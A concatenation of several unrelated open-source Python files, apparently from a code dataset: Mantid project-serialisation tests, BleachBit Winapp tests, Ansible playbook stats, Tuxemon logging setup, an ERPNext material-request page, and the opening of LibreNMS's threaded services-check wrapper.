self.assertEqual(int(contents['<windows>']), 1)
# Check workspace list was written
workspace_list = contents['mantidworkspaces']['WorkspaceNames']
self.assertEqual(workspace_list, workspace_name)
# Check plot was written
plot_titles = contents['multiLayer']['graph']['PlotTitle']
self.assertEqual(len(plot_titles), 3)
self.assertEqual(plot_titles[0], workspace_name)
def test_project_file_1D_plot_with_labels_modified(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1])
# modify axes labels
graph = windows()[0]
layer = graph.layer(1)
# call using threadsafe_call to ensure things are executed on the GUI
# thread, otherwise we get segfaults.
threadsafe_call(layer.setTitle, "Hello World")
threadsafe_call(layer.setAxisTitle, 0, "Y Axis Modified")
threadsafe_call(layer.setAxisTitle, 2, "X Axis Modified")
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
        # Check correct number of windows
self.assertEqual(int(contents['<windows>']), 1)
# Check plot title is correct
plot_title = contents['multiLayer']['graph']['PlotTitle']
self.assertEqual(len(plot_title), 3)
self.assertEqual(plot_title[0], "Hello World")
# Check axes titles are correct
axes_titles = contents['multiLayer']['graph']['AxesTitles']
self.assertEqual(len(axes_titles), 2)
self.assertEqual(axes_titles[0], 'X Axis Modified')
self.assertEqual(axes_titles[1], 'Y Axis Modified')
def test_project_file_1D_plot_with_error_bars(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 0, error_bars=True)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
error_bars = contents['multiLayer']['graph']['MantidYErrors']['1']
self.assertEqual(len(error_bars), 5)
def test_project_file_1D_plot_with_axes_scaling(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 0)
# modify axes scales
graph = windows()[0]
layer = graph.layer(1)
# call using threadsafe_call to ensure things are executed on the GUI
# thread. Otherwise we get segfaults.
threadsafe_call(layer.setAxisScale, 0, 10, 10)
threadsafe_call(layer.logYlinX)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
# Check axis scales are as expected
scales = contents['multiLayer']['graph']['scale']
scale1, scale2, scale3, scale4 = scales[0], scales[1], scales[2], scales[3]
self.assertAlmostEqual(float(scale1[1]), 110.6670313)
self.assertEqual(int(scale1[2]), 1000)
self.assertAlmostEqual(float(scale2[1]), 110.6670313)
self.assertEqual(int(scale2[2]), 1000)
self.assertEqual(int(scale3[1]), 0)
self.assertEqual(int(scale3[2]), 12)
self.assertEqual(int(scale4[1]), 0)
self.assertEqual(int(scale4[2]), 12)
def test_serialise_with_no_data(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 0)
self.assertEqual(len(mtd.getObjectNames()), 1)
def test_serialise_1D_plot_with_plotted_spectrum(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 1)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
def test_serialise_1D_plot_with_two_plot_windows(self):
create_dummy_workspace("ws1")
create_dummy_workspace("ws2")
plotSpectrum("ws1", 1)
plotSpectrum("ws2", 1)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 2)
self.assertEqual(len(mtd.getObjectNames()), 2)
# Check both windows are graph objects
for window in windows():
# slight hack as 'type' only returns
# an MDIWindow instance
self.assertTrue('Graph' in str(window))
def test_serialise_1D_plot_with_one_plot_and_multiple_spectra(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1])
self.save_and_reopen_project()
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(mtd.getObjectNames()), 1)
self.assertEqual(len(windows()), 1)
graph = windows()[0]
layer = graph.layer(1)
# Check graph and layer exist
self.assertTrue('Graph' in str(graph))
self.assertTrue(layer is not None)
# Check plot curves exist
curve1 = layer.curve(0)
curve2 = layer.curve(1)
self.assertTrue('QwtPlotCurve', str(type(curve1)))
self.assertTrue('QwtPlotCurve', str(type(curve2)))
def test_serialise_waterfall_plot(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1], waterfall=True)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
# Check window exists
graph = windows()[0]
self.assertTrue('Graph' in str(graph))
# Check plot curves exist
layer = graph.layer(1)
curve1 = layer.curve(0)
curve2 = layer.curve(1)
self.assertTrue('QwtPlotCurve', str(type(curve1)))
self.assertTrue('QwtPlotCurve', str(type(curve2)))
def test_serialise_2D_plot(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plot2D(workspace_name)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
# Check window exists
graph = windows()[0]
self.assertTrue('Graph' in str(graph))
def test_save_instrument_view(self):
workspace_name = 'fake_workspace'
instrument_name = 'IRIS'
# make a workspace with an instrument
CreateSampleWorkspace(OutputWorkspace=workspace_name)
LoadInstrument(Workspace=workspace_name, MonitorList='1,2',
InstrumentName=instrument_name, RewriteSpectraMap=True)
window = getInstrumentView(workspace_name)
render_tab = window.getTab("Render")
# range options
render_tab.setMinValue(1.25)
render_tab.setMaxValue(1.75)
render_tab.setRange(1.35,1.85)
render_tab.showAxes(True)
# display options
render_tab.displayDetectorsOnly(True)
render_tab.setColorMapAutoscaling(True)
render_tab.setSurfaceType(InstrumentWidgetRenderTab.CYLINDRICAL_Y)
render_tab.flipUnwrappedView(True)
# pick tab
pick_tab = window.getTab(InstrumentWidget.PICK)
pick_tab.selectTool(InstrumentWidgetPickTab.PeakSelect)
# mask tab
mask_tab = window.getTab(InstrumentWidget.MASK)
mask_tab.setMode(InstrumentWidgetMaskTab.Group)
mask_tab.selectTool(InstrumentWidgetMaskTab.DrawEllipse)
tree_tab = window.getTab(InstrumentWidget.TREE)
tree_tab.selectComponentByName("graphite")
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
window_options = contents['instrumentwindow']
        self.assertEqual(int(window_options['SurfaceType']), 2)
        self.assertEqual(int(window_options['CurrentTab']), 0)
# render tab options
render_options = contents['instrumentwindow']['tabs']['rendertab']
self.assertEqual(bool(render_options["DisplayDetectorsOnly"]), True)
self.assertEqual(bool(render_options["AutoScaling"]), True)
self.assertEqual(bool(render_options["FlipView"]), True)
# pick tab options
pick_options = contents['instrumentwindow']['tabs']['picktab']
self.assertEqual(bool(pick_options['ActiveTools'][9]), True)
# mask tab options
mask_options = contents['instrumentwindow']['tabs']['masktab']
self.assertEqual(bool(mask_options['ActiveType'][1]), True)
self.assertEqual(bool(mask_options['ActiveTools'][2]), True)
def assert_project_files_saved(self, workspace_name):
"""Check files were written to project folder """
file_name = '%s.nxs' % workspace_name
file_path = os.path.join(self._project_folder, file_name)
self.assertTrue(os.path.isdir(self._project_folder))
self.assertTrue(os.path.isfile(self._project_file))
self.assertTrue(os.path.isfile(file_path))
def save_and_reopen_project(self):
"""Save project and clear mantid then reopen the project """
saveProjectAs(self._project_folder)
clear_mantid()
openProject(self._project_file)
def clear_mantid():
"""Clear plots and workspaces from Mantid.
This will also start a new project and remove any previous
project data
"""
# Remove windows and plots
for window in windows():
window.confirmClose(False)
window.close()
QtCore.QCoreApplication.processEvents()
# Clear workspaces
mtd.clear()
# Start a blank project to remove anything else
newProject()
def create_dummy_workspace(ws_name):
""" Create a dummy mantid workspace with some data """
X1 = np.linspace(0, 10, 100)
Y1 = 1000*(np.sin(X1)**2) + X1*10
X1 = np.append(X1, 10.1)
X2 = np.linspace(2, 12, 100)
Y2 = 500*(np.cos(X2/2.)**2) + 20
X2 = np.append(X2, 12.10)
X = np.append(X1, X2)
Y = np.append(Y1, Y2)
E = np.sqrt(Y)
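    # 101 X values vs. 100 Y values per spectrum, so the workspace below is
    # created as histogram (bin-edge) data with two spectra.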
CreateWorkspace(OutputWorkspace=ws_name, DataX=list(X),
DataY=list(Y), DataE=list(E), NSpec=2,
UnitX="TOF", YUnitLabel="Counts",
WorkspaceTitle="Faked data Workspace")
def remove_folder(folder_name):
""" Remove a project folder after a test """
if not os.path.isdir(folder_name):
raise IOError('Path is not a directory')
try:
shutil.rmtree(folder_name)
    except OSError:
        raise IOError('Could not clean up folder after test')
def get_project_file_contents(folder_name):
""" Get the contents of a Mantid project file given the folder """
if not os.path.isdir(folder_name):
raise IOError('Path is not a directory')
project_name = os.path.basename(folder_name) + '.mantid'
project_file = os.path.join(folder_name, project_name)
with open(project_file, 'r') as file_handle:
contents = file_handle.read()
return contents
def parse_project_file(contents, pattern=""):
""" Create a dictionary of the Mantid project file entries """
if pattern == "":
pattern_str = "<(?P<tag>[a-zA-Z]*)>(.*)</(?P=tag)>"
pattern = re.compile(pattern_str, flags=re.MULTILINE | re.DOTALL)
match = re.findall(pattern, contents)
contents = re.sub(pattern, '', contents)
data = {}
# recursively parse sections
    if len(match) > 0:
        for x, y in match:
            data[x] = y
for key in data.keys():
data[key] = parse_project_file(data[key], pattern)
# parse individual property lines
lines = contents.strip().split('\n')
for line in lines:
properties = line.strip().split('\t')
key = properties[0]
values = properties[1:]
if key in data.keys():
            # if it already exists then add multiple entries as a dictionary
            # with numerical keys corresponding to the order added
if not isinstance(data[key], dict):
data[key] = {0: data[key]}
data[key][max(data[key])+1] = values
elif len(properties) == 2:
data[key] = values[0]
else:
data[key] = values
return data
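# Illustrative sketch (input invented for this note): given the fragment
#   "<mantidmatrix>\ntitle\tws1\n</mantidmatrix>"
# parse_project_file nests the tagged section, so the result maps
# 'mantidmatrix' to a dict containing {'title': 'ws1'}; tab-separated lines
# outside any tag become top-level key/value entries.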
def read_project_file(folder_name):
""" Read and parse a Mantid project file """
contents = get_project_file_contents(folder_name)
return parse_project_file(contents)
# Run the unit tests
mantidplottests.runTests(MantidPlotProjectSerialiseTest)
| dymkowsk/mantid | MantidPlot/test/MantidPlotProjectSerialiseTest.py | Python | gpl-3.0 | 15,205 |
# vim: ts=4:sw=4:expandtab
# BleachBit
# Copyright (C) 2008-2015 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test cases for module Winapp
"""
import os
import shutil
import sys
import unittest
sys.path.append('.')
from bleachbit.Winapp import Winapp, detectos, detect_file, section2option
from bleachbit.Windows import detect_registry_key
import common
if 'nt' == os.name:
import _winreg
else:
def fake_detect_registry_key(f):
return True
import bleachbit.Windows
bleachbit.Windows.detect_registry_key = fake_detect_registry_key
def get_winapp2():
"""Download and cache winapp2.ini. Return local filename."""
url = "http://www.winapp2.com/Winapp2.ini"
tmpdir = None
if 'posix' == os.name:
tmpdir = '/tmp'
if 'nt' == os.name:
tmpdir = os.getenv('TMP')
fn = os.path.join(tmpdir, 'bleachbit_test_winapp2.ini')
if os.path.exists(fn):
import time
import stat
age_seconds = time.time() - os.stat(fn)[stat.ST_MTIME]
        if age_seconds > (24 * 60 * 60):  # stale after 24 hours
print 'note: deleting stale file %s ' % fn
os.remove(fn)
if not os.path.exists(fn):
        import urllib2
        txt = urllib2.urlopen(url).read()
        f = file(fn, 'w')
        f.write(txt)
        f.close()
return fn
class WinappTestCase(unittest.TestCase):
"""Test cases for Winapp"""
def run_all(self, cleaner, really_delete):
"""Test all the cleaner options"""
for (option_id, __name) in cleaner.get_options():
for cmd in cleaner.get_commands(option_id):
for result in cmd.execute(really_delete):
common.validate_result(self, result, really_delete)
def test_remote(self):
"""Test with downloaded file"""
winapps = Winapp(get_winapp2())
for cleaner in winapps.get_cleaners():
self.run_all(cleaner, False)
def test_detectos(self):
"""Test detectos function"""
# Tests are in the format (required_ver, mock, expected_return)
tests = (('5.1', '5.1', True),
('5.1', '6.0', False),
('6.0', '5.1', False),
('|5.1', '5.1', True),
('|5.1', '6.0', False),
('6.1|', '5.1', False),
('6.1|', '6.0', False),
('6.1|', '6.1', True),
('6.1|', '6.2', True),
('6.2|', '5.1', False),
('6.2|', '6.0', False),
('6.2|', '6.1', False),
('6.2|', '6.2', True))
for (s, mock, expected_return) in tests:
actual_return = detectos(s, mock)
self.assertEqual(expected_return, actual_return,
'detectos(%s, %s)==%s instead of %s' % (s, mock,
actual_return, expected_return))
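    # Reading the table above: a bare version means an exact match, '|x' means
    # "x or older", and 'x|' means "x or newer" -- e.g. detectos('6.1|', '6.2')
    # is True because the mocked Windows 6.2 is at least 6.1.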
def test_detect_file(self):
"""Test detect_file function"""
tests = [('%windir%\\system32\\kernel32.dll', True),
('%windir%\\system32', True),
('%ProgramFiles%\\Internet Explorer', True),
('%ProgramFiles%\\Internet Explorer\\', True),
('%windir%\\doesnotexist', False),
('%windir%\\system*', True),
('%windir%\\*ystem32', True),
('%windir%\\*ystem3*', True)]
# On 64-bit Windows, Winapp2.ini expands the %ProgramFiles% environment
# variable to also %ProgramW6432%, so test unique entries in
# %ProgramW6432%.
import struct
if not 32 == 8 * struct.calcsize('P'):
raise NotImplementedError('expecting 32-bit Python')
if os.getenv('ProgramW6432'):
dir_64 = os.listdir(os.getenv('ProgramFiles'))
dir_32 = os.listdir(os.getenv('ProgramW6432'))
dir_32_unique = set(dir_32) - set(dir_64)
if dir_32 and not dir_32_unique:
raise RuntimeError(
'Test expects objects in %ProgramW6432% not in %ProgramFiles%')
for pathname in dir_32_unique:
tests.append(('%%ProgramFiles%%\\%s' % pathname, True))
else:
print 'NOTE: skipping %ProgramW6432% tests because WoW64 not detected'
for (pathname, expected_return) in tests:
actual_return = detect_file(pathname)
msg = 'detect_file(%s) returned %s' % (pathname, actual_return)
self.assertEqual(expected_return, actual_return, msg)
def test_fake(self):
"""Test with fake file"""
ini_fn = None
keyfull = 'HKCU\\Software\\BleachBit\\DeleteThisKey'
subkey = 'Software\\BleachBit\\DeleteThisKey\\AndThisKey'
def setup_fake(f1_filename=None):
"""Setup the test environment"""
dirname = tempfile.mkdtemp(prefix='bleachbit-test-winapp')
f1 = os.path.join(dirname, f1_filename or 'deleteme.log')
file(f1, 'w').write('')
dirname2 = os.path.join(dirname, 'sub')
os.mkdir(dirname2)
f2 = os.path.join(dirname2, 'deleteme.log')
file(f2, 'w').write('')
fbak = os.path.join(dirname, 'deleteme.bak')
file(fbak, 'w').write('')
self.assertTrue(os.path.exists(f1))
self.assertTrue(os.path.exists(f2))
self.assertTrue(os.path.exists(fbak))
hkey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, subkey)
hkey.Close()
self.assertTrue(detect_registry_key(keyfull))
self.assertTrue(detect_registry_key('HKCU\\%s' % subkey))
return (dirname, f1, f2, fbak)
def ini2cleaner(filekey, do_next=True):
ini = file(ini_fn, 'w')
ini.write('[someapp]\n')
ini.write('LangSecRef=3021\n')
ini.write(filekey)
ini.write('\n')
ini.close()
self.assertTrue(os.path.exists(ini_fn))
if do_next:
return Winapp(ini_fn).get_cleaners().next()
else:
return Winapp(ini_fn).get_cleaners()
# reuse this path to store a winapp2.ini file in
import tempfile
(ini_h, ini_fn) = tempfile.mkstemp(suffix='.ini', prefix='winapp2')
os.close(ini_h)
# a set of tests
tests = [
# single file
('FileKey1=%s|deleteme.log', None,
False, True, False, True, True, True),
# special characters for XML
('FileKey1=%s|special_chars_&-\'.txt', 'special_chars_&-\'.txt',
False, True, False, True, True, True),
# *.log
('FileKey1=%s|*.LOG', None, False, True, False, True, True, True),
# semicolon separates different file types
('FileKey1=%s|*.log;*.bak', None,
False, True, False, True, False, True),
# *.*
('FileKey1=%s|*.*', None, False, True, False, True, False, True),
# recurse *.*
('FileKey1=%s|*.*|RECURSE', None, False,
True, False, False, False, True),
# remove self *.*, this removes the directory
('FileKey1=%s|*.*|REMOVESELF', None,
False, False, False, False, False, True),
]
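        # Tuple fields, matching the assertions in the loop below:
        # (FileKey line, optional f1 filename, auto_hide before cleaning,
        #  then post-clean existence of the directory, f1, f2 and the .bak
        #  file, and auto_hide after cleaning).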
        # Add positive detection clauses (where detection believes the
        # application is present) to all the tests; these stay positive.
new_tests = []
for test in tests:
for detect in (
"\nDetectFile=%%APPDATA%%\\Microsoft",
"\nDetectFile1=%%APPDATA%%\\Microsoft\nDetectFile2=%%APPDATA%%\\does_not_exist",
"\nDetectFile1=%%APPDATA%%\\does_not_exist\nDetectFile2=%%APPDATA%%\\Microsoft",
"\nDetect=HKCU\\Software\\Microsoft",
"\nDetect1=HKCU\\Software\\Microsoft\nDetect2=HKCU\\Software\\does_not_exist",
"\nDetect1=HKCU\\Software\\does_not_exist\nDetect2=HKCU\\Software\\Microsoft"):
new_ini = test[0] + detect
new_test = [new_ini, ] + [x for x in test[1:]]
new_tests.append(new_test)
positive_tests = tests + new_tests
# execute positive tests
for test in positive_tests:
print 'positive test: ', test
(dirname, f1, f2, fbak) = setup_fake(test[1])
cleaner = ini2cleaner(test[0] % dirname)
self.assertEqual(test[2], cleaner.auto_hide())
self.run_all(cleaner, False)
self.run_all(cleaner, True)
self.assertEqual(test[3], os.path.exists(dirname))
self.assertEqual(test[4], os.path.exists(f1))
self.assertEqual(test[5], os.path.exists(f2))
self.assertEqual(test[6], os.path.exists(fbak))
self.assertEqual(test[7], cleaner.auto_hide())
shutil.rmtree(dirname, True)
# negative tests where the application detect believes the application
# is absent
for test in tests:
for detect in (
"\nDetectFile=c:\\does_not_exist",
# special characters for XML
"\nDetectFile=c:\\does_not_exist_special_chars_&'",
"\nDetectFile1=c:\\does_not_exist1\nDetectFile2=c:\\does_not_exist2",
"\nDetect=HKCU\\Software\\does_not_exist",
"\nDetect=HKCU\\Software\\does_not_exist_&'",
"\nDetect1=HKCU\\Software\\does_not_exist1\nDetect2=HKCU\\Software\\does_not_exist1"):
new_ini = test[0] + detect
t = [new_ini, ] + [x for x in test[1:]]
print 'negative test', t
# execute the test
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner(t[0] % dirname, False)
self.assertRaises(StopIteration, cleaner.next)
# registry key, basic
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner('RegKey1=%s' % keyfull)
self.run_all(cleaner, False)
self.assertTrue(detect_registry_key(keyfull))
self.run_all(cleaner, True)
self.assertFalse(detect_registry_key(keyfull))
# check for parse error with ampersand
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner('RegKey1=HKCU\\Software\\PeanutButter&Jelly')
self.run_all(cleaner, False)
self.run_all(cleaner, True)
def test_section2option(self):
"""Test for section2option()"""
tests = ((' FOO2 ', 'foo2'),
('A - B (C)', 'a_b_c'))
for test in tests:
self.assertEqual(section2option(test[0]), test[1])
def suite():
return unittest.makeSuite(WinappTestCase)
if __name__ == '__main__':
unittest.main()
| uudiin/bleachbit | tests/TestWinapp.py | Python | gpl-3.0 | 11,482 |
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
''' return information about a particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
def set_custom_stats(self, which, what, host=None):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
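# Minimal usage sketch (hypothetical host name; not part of Ansible itself):
#
#   stats = AggregateStats()
#   stats.increment('ok', 'web01')
#   stats.increment('changed', 'web01')
#   stats.summarize('web01')
#   # -> {'ok': 1, 'failures': 0, 'unreachable': 0, 'changed': 1, 'skipped': 0}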
| alvaroaleman/ansible | lib/ansible/executor/stats.py | Python | gpl-3.0 | 2,779 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Tuxemon
# Copyright (C) 2014, William Edwards <[email protected]>,
# Benjamin Bean <[email protected]>
#
# This file is part of Tuxemon.
#
# Tuxemon is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tuxemon is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Tuxemon. If not, see <http://www.gnu.org/licenses/>.
#
# Contributor(s):
#
# William Edwards <[email protected]>
#
#
# core.components.log Logging module.
#
#
import sys
import logging
from . import config as Config
# read the configuration file
config = Config.Config()
loggers = {}
# Set up logging if the configuration has it enabled
if config.debug_logging == "1":
for logger_name in config.loggers:
# Enable logging
logger = logging.getLogger(logger_name)
logger.setLevel(int(config.debug_level))
log_hdlr = logging.StreamHandler(sys.stdout)
log_hdlr.setLevel(logging.DEBUG)
log_hdlr.setFormatter(logging.Formatter("%(asctime)s - %(name)s - "
"%(levelname)s - %(message)s"))
logger.addHandler(log_hdlr)
loggers[logger_name] = logger
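# Usage sketch ("core" is an assumed logger name that would have to appear in
# config.loggers, with debug_logging enabled in the configuration):
#
#   import logging
#   logger = logging.getLogger("core")
#   logger.debug("routed through the stdout handler configured above")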
| andrefbsantos/Tuxemon | tuxemon/core/components/log.py | Python | gpl-3.0 | 1,644 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
from frappe.utils import flt
def get_context(context):
context.no_cache = 1
context.show_sidebar = True
context.doc = frappe.get_doc(frappe.form_dict.doctype, frappe.form_dict.name)
if hasattr(context.doc, "set_indicator"):
context.doc.set_indicator()
context.parents = frappe.form_dict.parents
context.title = frappe.form_dict.name
if not frappe.has_website_permission(context.doc):
frappe.throw(_("Not Permitted"), frappe.PermissionError)
default_print_format = frappe.db.get_value('Property Setter', dict(property='default_print_format', doc_type=frappe.form_dict.doctype), "value")
if default_print_format:
context.print_format = default_print_format
else:
context.print_format = "Standard"
context.doc.items = get_more_items_info(context.doc.items, context.doc.name)
def get_more_items_info(items, material_request):
for item in items:
item.customer_provided = frappe.get_value('Item', item.item_code, 'is_customer_provided_item')
item.work_orders = frappe.db.sql("""
select
wo.name, wo.status, wo_item.consumed_qty
from
`tabWork Order Item` wo_item, `tabWork Order` wo
where
wo_item.item_code=%s
and wo_item.consumed_qty=0
and wo_item.parent=wo.name
and wo.status not in ('Completed', 'Cancelled', 'Stopped')
order by
wo.name asc""", item.item_code, as_dict=1)
item.delivered_qty = flt(frappe.db.sql("""select sum(transfer_qty)
from `tabStock Entry Detail` where material_request = %s
and item_code = %s and docstatus = 1""",
(material_request, item.item_code))[0][0])
return items
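# Shape of each annotated item returned above (sketch; actual values depend on
# the live database):
#   item.customer_provided -> is_customer_provided_item flag from the Item
#   item.work_orders       -> open Work Orders whose consumed_qty is still 0
#   item.delivered_qty     -> summed transfer_qty of submitted Stock Entries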
| mhbu50/erpnext | erpnext/templates/pages/material_request_info.py | Python | gpl-3.0 | 1,743 |
#! /usr/bin/env python3
"""
services-wrapper A small tool which wraps around check-services.php and tries to
guide the services process with a more modern approach with a
Queue and workers.
Based on the original version of poller-wrapper.py by Job Snijders
Author: Neil Lathwood <[email protected]>
Orsiris de Jong <[email protected]>
Date: Oct 2019
Usage: This program accepts one command line argument: the number of threads
that should run simultaneously. If no argument is given it will assume
a default of 1 thread.
Ubuntu Linux: apt-get install python-mysqldb
FreeBSD: cd /usr/ports/*/py-MySQLdb && make install clean
RHEL 7: yum install MySQL-python
RHEL 8: dnf install mariadb-connector-c-devel gcc && python -m pip install mysqlclient
Tested on: Python 3.6.8 / PHP 7.2.11 / CentOS 8
License: This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see https://www.gnu.org/licenses/.
LICENSE.txt contains a copy of the full GPLv3 licensing conditions.
"""
import LibreNMS.library as LNMS
try:
import json
import os
import queue
import subprocess
import sys
import threading
import time
from optparse import OptionParser
except ImportError as exc:
print("ERROR: missing one or more of the following python modules:")
print("threading, queue, sys, subprocess, time, os, json")
print("ERROR: %s" % exc)
sys.exit(2)
APP_NAME = "services_wrapper"
LOG_FILE = "logs/" + APP_NAME + ".log"
_DEBUG = False
servicedisco = False
real_duration = 0
service_devices = 0
"""
Threading helper functions
"""
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC0
def memc_alive():
try:
global memc
key = str(uuid.uuid4())
memc.set("poller.ping." + key, key, 60)
if memc.get("poller.ping." + key) == key:
memc.delete("poller.ping." + key)
return True
else:
return False
except:
return False
def memc_touch(key, time):
try:
global memc
val = memc.get(key)
memc.set(key, val, time)
except:
pass
def get_time_tag(step):
ts = int(time.time())
return ts - ts % step
# EOC0
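# Worked example (illustrative values): get_time_tag(300) floors the current
# epoch to the nearest 300-second boundary, e.g. ts = 1000 gives
# 1000 - (1000 % 300) = 900.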
"""
A separate queue and a single worker for printing information to the screen prevents
the good old joke:
Some people, when confronted with a problem, think,
"I know, I'll use threads," and then they two they hav erpoblesms.
"""
def printworker():
nodeso = 0
while True:
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC4
global IsNode
global servicedisco
if servicedisco:
if not IsNode:
memc_touch("service.master", 10)
nodes = memc.get("service.nodes")
if nodes is None and not memc_alive():
print(
"WARNING: Lost Memcached. Taking over all devices. Nodes will quit shortly."
)
servicedisco = False
nodes = nodeso
if nodes is not nodeso:
print("INFO: %s Node(s) Total" % (nodes))
nodeso = nodes
else:
memc_touch("service.nodes", 10)
try:
worker_id, device_id, elapsed_time = print_queue.get(False)
except:
                try:
time.sleep(1)
except:
pass
continue
else:
worker_id, device_id, elapsed_time = print_queue.get()
# EOC4
global real_duration
global per_device_duration
global service_devices
real_duration += elapsed_time
per_device_duration[device_id] = elapsed_time
service_devices += 1
if elapsed_time < 300:
print(
"INFO: worker %s finished device %s in %s seconds"
% (worker_id, device_id, elapsed_time)
)
else:
print(
"WARNING: worker %s finished device %s in %s seconds"
% (worker_id, device_id, elapsed_time)
)
print_queue.task_done()
"""
This worker forks off single instances of the check-services.php process, records
how long each takes, and pushes the resulting reports to the printer queue
"""
def poll_worker():
while True:
device_id = poll_queue.get()
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC5
if not servicedisco or memc.get("service.device." + str(device_id)) is None:
if servicedisco:
result = memc.add(
"service.device." + str(device_id),
config["distributed_poller_name"],
300,
)
if not result:
print(
"This device (%s) appears to be being service checked by another service node"
% (device_id)
)
poll_queue.task_done()
continue
if not memc_alive() and IsNode:
print(
"Lost Memcached, Not service checking Device %s as Node. Master will check it."
% device_id
)
poll_queue.task_done()
continue
# EOC5
try:
start_time = time.time()
output = (
"-d >> %s/services_device_%s.log" % (log_dir, device_id)
if debug
else ">> /dev/null"
)
# TODO replace with command_runner
command = "/usr/bin/env php %s -h %s %s 2>&1" % (
service_path,
device_id,
output,
)
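            # e.g. with an illustrative install dir and device id 42:
            #   /usr/bin/env php /opt/librenms/check-services.php -h 42 >> /dev/null 2>&1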
subprocess.check_call(command, shell=True)
elapsed_time = int(time.time() - start_time)
print_queue.put(
[threading.current_thread().name, device_id, elapsed_time]
)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
poll_queue.task_done()
if __name__ == "__main__":
logger = LNMS.logger_get_logger(LOG_FILE, debug=_DEBUG)
